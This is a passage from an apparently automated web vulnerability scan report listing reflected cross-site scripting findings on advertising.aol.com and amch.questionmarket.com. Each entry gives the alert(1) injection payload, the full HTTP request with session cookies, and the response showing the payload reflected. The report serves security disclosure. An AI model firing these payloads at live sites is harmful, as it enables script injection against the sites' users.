Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/ee14a"><script>alert(1)</script>2c72c6f0042/6/3/882857095/" />
...[SNIP]...
4.93. http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/3/882857095/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8de4c"-alert(1)-"94a4b50c585 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8de4c"-alert(1)-"94a4b50c585/6/3/882857095/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:26 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/8de4c"-alert(1)-"94a4b50c585/6/3/882857095/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...
4.94. http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/1/52531776/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8c8a"><script>alert(1)</script>3d537fa6b19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c8c8a"><script>alert(1)</script>3d537fa6b19/7/1/52531776/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/c8c8a"><script>alert(1)</script>3d537fa6b19/7/1/52531776/" />
...[SNIP]...
4.95. http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/1/52531776/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23776"-alert(1)-"cda52c37549 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /23776"-alert(1)-"cda52c37549/7/1/52531776/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/23776"-alert(1)-"cda52c37549/7/1/52531776/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertis
...[SNIP]...
4.96. http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/3/1777313403/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ae45"><script>alert(1)</script>6be78db95a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /5ae45"><script>alert(1)</script>6be78db95a0/7/3/1777313403/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:07 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/5ae45"><script>alert(1)</script>6be78db95a0/7/3/1777313403/" />
...[SNIP]...
4.97. http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/3/1777313403/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2e0c"-alert(1)-"71367095148 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e2e0c"-alert(1)-"71367095148/7/3/1777313403/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e2e0c"-alert(1)-"71367095148/7/3/1777313403/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...
4.98. http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/1/585997419/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9666"><script>alert(1)</script>81ecfa560d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c9666"><script>alert(1)</script>81ecfa560d4/8/1/585997419/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/c9666"><script>alert(1)</script>81ecfa560d4/8/1/585997419/" />
...[SNIP]...
4.99. http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/1/585997419/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ab87"-alert(1)-"af55da2faa0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4ab87"-alert(1)-"af55da2faa0/8/1/585997419/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4ab87"-alert(1)-"af55da2faa0/8/1/585997419/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...
4.100. http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/144927758/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bd70"-alert(1)-"dfbccaadf2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /5bd70"-alert(1)-"dfbccaadf2d/8/3/144927758/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:17 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/5bd70"-alert(1)-"dfbccaadf2d/8/3/144927758/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...
4.101. http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/144927758/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22ce9"><script>alert(1)</script>8c28112e197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /22ce9"><script>alert(1)</script>8c28112e197/8/3/144927758/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/22ce9"><script>alert(1)</script>8c28112e197/8/3/144927758/" />
...[SNIP]...
4.102. http://amch.questionmarket.com/adscgen/d_layer.php [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4baab'%3balert(1)//ad8fd748637 was submitted in the lang parameter. This input was echoed as 4baab';alert(1)//ad8fd748637 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=4baab'%3balert(1)//ad8fd748637&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:38:46 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Content-Type: text/html
Content-Length: 12165

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
eyClickthru = 1;
}
   DL_Close(false);

window.top.location.href='http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=918801&from_node=28067&site=8&frame=&lang=4baab';alert(1)//ad8fd748637&dl_logo=&invite=no&link='+escape(window.location.href)+'&orig='+escape(window.location.href);
}

function DL_Close(adscout) {
   if (typeof adscout == 'undefined' || adscout == true) {
       DL_Adscout(adsc
...[SNIP]...
4.103. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b71a"%3balert(1)//b7312e4f877 was submitted in the site parameter. This input was echoed as 2b71a";alert(1)//b7312e4f877 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=82b71a"%3balert(1)//b7312e4f877 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:00 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Content-Type: text/html
Content-Length: 12193

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
t);
   }
   // Set a flag so animation loop will stop running
   DL_ScrollState = 2;
   DL_Scroll();
}

function DL_Adscout(adscout) {
   (new Image).src="//amch.questionmarket.com/adscgen/adscout_dc.php?site=82b71a";alert(1)//b7312e4f877&code=&survey_num=918801&ord="+Math.floor((new Date()).getTime());
}

function DL_Add(){
   DL_InsertSwf();
}

function DL_FlashInstalled() {
   // Detect swf plugin.

   var result = false;
   if (navigator.m
...[SNIP]...
4.104. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
